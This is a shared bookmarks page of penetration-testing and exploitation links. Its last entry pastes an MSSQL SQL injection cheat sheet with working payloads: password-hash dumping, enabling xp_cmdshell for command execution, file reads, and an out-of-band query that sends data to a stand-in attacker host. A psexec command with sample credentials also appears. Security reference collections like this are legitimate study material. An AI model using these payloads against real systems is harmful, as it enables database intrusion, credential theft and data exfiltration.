Search: [exploitation] - Shared Bookmarks

Links per page: 20 50 100

◄Older

page 1 / 2

24 results tagged exploitation x

SQL Server UNC Path Injection Cheatsheet
May 23, 2023 at 9:18:25 PM UTC - permalink -

- https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e

mssql exploitation unc
Guide - Vulnerable Kernel Drivers For Exploitation
April 14, 2022 at 3:50:55 PM UTC * - permalink -

- https://guidedhacking.com/threads/vulnerable-kernel-drivers-for-exploitation.15979/

kernel driver exploitation windows privesc
hfiref0x/KDU - githubhot
April 14, 2022 at 3:50:43 PM UTC * - permalink -

- https://githubhot.com/repo/hfiref0x/KDU

kernel driver exploitation windows privesc
CORS-USESEC18.pdf
September 29, 2021 at 8:29:15 PM UTC - permalink -

- https://www.jianjunchen.com/papers/CORS-USESEC18.pdf

paper cors study exploitation
РНР_wrappers.pdf
November 11, 2020 at 11:24:43 AM UTC - permalink -

- https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/%D0%90.%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D0%B8%D0%BD_%D0%9E_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF_%D0%B8%D1%81%D0%BF_%D0%A0%D0%9D%D0%A0_wrappers.pdf

php wrappers exploitation
Exploit with PHP Protocols / Wrappers - cdxy
November 10, 2020 at 4:41:29 PM UTC - permalink -

- https://www.cdxy.me/?p=752

php wrapper exploitation filters url include lfi rfi rce
GitHub - RPISEC/MBE: Course materials for Modern Binary Exploitation by RPISEC
June 20, 2020 at 11:39:47 AM UTC - permalink -

- https://github.com/RPISEC/MBE

binexp binary exploitation pwn
Windows exploitation - FullPwn Security Operations
May 6, 2020 at 5:03:52 PM UTC - permalink -

- https://fullpwnops.com/windows-exploitation-pathway.html

windows exploitation pwn exploit
Nightmare (binary exploitation)
April 20, 2020 at 3:08:18 PM UTC - permalink -

- https://guyinatuxedo.github.io/

binary exploitation pwn reverse engineering re ghidra gdb pwntools ctf
Heap overflow, and again :)
April 15, 2020 at 2:37:41 PM UTC - permalink -

- http://security.cs.rpi.edu/courses/binexp-spring2015/lectures/17/10_lecture.pdf

heap courses exploit pwn exploitation
More Heap Exploitation
April 15, 2020 at 2:34:47 PM UTC - permalink -

- https://www.blackhat.com/presentations/bh-usa-07/Ferguson/Whitepaper/bh-usa-07-ferguson-WP.pdf

heap exploitation exploit pwn malloc paper blackhat
Preface · Heap Exploitation
April 15, 2020 at 2:34:29 PM UTC - permalink -

- https://heap-exploitation.dhavalkapil.com/

heap exploit pwn exploitation tuto howto gettingstarted
LOLBAS

Lolbins -> Windows
GTFOBin -> Linux (https://gtfobins.github.io/)
August 1, 2019 at 2:55:00 PM UTC * - permalink -

- https://lolbas-project.github.io/

gtfobin gtfo lolbins privesc pe exploitation hacking pentest jailbreak
BloodHound with Kali Linux: 101 - Red Teaming Experiments
April 3, 2019 at 11:54:50 AM UTC - permalink -

- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux

bloodhound windows hacking penstest active directory ad exploitation mapping ldap sharphound
PHP security exploit - list content of remote PHP file? - Stack Overflow
April 1, 2019 at 11:29:13 PM UTC * - permalink -

- https://stackoverflow.com/questions/20726247/php-security-exploit-list-content-of-remote-php-file

php lfi wrapper include data type hacking pentest exploitation
A Virgil's Guide to Pentest: Escalation Time
March 31, 2019 at 7:17:11 PM UTC - permalink -

- http://virgil-cj.blogspot.com/2018/02/escalation-time.html

windows hacking pentest post exploitation guide howto
PowerUp: A Usage Guide – harmj0y
March 31, 2019 at 7:04:32 PM UTC - permalink -

- https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/

powerup powershell windows exploitation post hacking pentest
Using Credentials to Own Windows Boxes (from Kali)

psexec.py 'DOMAIN\user:passw0rd1!'@10.10.10.10
March 31, 2019 at 7:03:07 PM UTC - permalink -

- https://blog.ropnop.com/using-credentials-to-own-windows-boxes/

psexec smb windows hacking post exploitation revshell
MSSQL Injection Cheat Sheet | pentestmonkey
March 28, 2019 at 1:38:44 PM UTC - permalink -

- http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

cheatsheet mssql sql injection enumeration enum post exploitation privilege escalation hacking pentest windows

SQL Injection Cheat Sheet: MSSQL — GracefulSecurity

Version
SELECT @@version;
SELECT @@VERSION LIKE '%2008%';

User details
SELECT user;
SELECT current_user;
SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT USER_NAME(2);
SELECT SUSER_SNAME();
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);

Database details
SELECT DB_NAME();
SELECT DB_NAME(5);
SELECT name FROM master..sysdatabases;

Database credentials
SELECT name %2b ':'  %2b master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;

Server details
SELECT @@servername; SELECT host_name(); SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel');

Table Names
SELECT name FROM master..sysobjects WHERE xtype='U';
SELECT table_name FROM information_schema.tables;

Columns Names
SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename';
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';

No Quotes
SELECT * FROM Users WHERE username = CHAR(97) + CHAR(98) + CHAR(99);
ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) = 97;
ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) < 128;

String Concatenation
SELECT CONCAT('a','a','a');
SELECT 'a' %2b 'b' %2b 'c' %2b 'd';

Conditionals
IF 1=1 SELECT 'true' ELSE SELECT 'false';
SELECT CASE WHEN 1=1 THEN true ELSE false END;

Time-delay
WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';

Enable Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'xp_cmdshell', 1;
EXEC sp_configure reconfigure;

Command Execution
EXEC master.dbo.xp_cmdshell 'cmd';

Enable Alternative Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'OLE Automation Procedures', 1;
EXEC sp_configure reconfigure;

Alternative Command Execution
DECLARE @execmd INT;
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT;
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%system32cmd.exe /c';

"RunAs"
SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'password', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
EXECUTE AS USER = 'FooUser';

Read Files
BULK INSERT dbo.temp FROM 'c:\foobar.txt' WITH ( ROWTERMINATOR='n' );

Out-of-Band Retrieval
;declare @q varchar(200);set @q='\attacker.controlledserver'+(SELECT SUBSTRING(@@version,1,9))+'.malicious.com/foo'; exec master.dbo.xp_dirtree @q; --  

Substrings
SUBSTRING(table_name,1,1) FROM information_schema.tables = 'A';
ASCII(SUBSTRING(table_name,1,1)) FROM information_schema.tables > 96;

Retrieve Nth Line
SELECT TOP 1 table_name FROM information_schema.tables;
SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables);

March 28, 2019 at 1:36:53 PM UTC - permalink -

- https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/

xp_cmdshell windows cheatsheet exploitation post postexploitation mssql sql injection enumeration enum hacking pentest

Links per page: 20 50 100

◄Older

page 1 / 2